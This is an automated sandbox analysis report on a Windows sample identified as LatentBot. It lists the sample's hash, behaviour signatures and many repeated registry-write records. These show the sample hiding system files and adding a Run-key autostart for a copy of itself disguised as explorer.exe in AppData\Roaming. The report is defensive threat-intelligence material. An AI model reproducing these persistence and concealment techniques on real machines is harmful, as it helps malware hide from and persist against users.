Analysis Overview
SHA256
492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
Threat Level: Known bad
The file JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af was found to be: Known bad.
Malicious Activity Summary
Latentbot family
LatentBot
Modifies visiblity of hidden/system files in Explorer
Executes dropped EXE
Adds Run key to start application
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-20 05:30
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-20 05:30
Reported
2025-04-20 05:32
Platform
win10v2004-20250410-en
Max time kernel
18s
Max time network
147s
Command Line
Signatures
LatentBot
Latentbot family
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
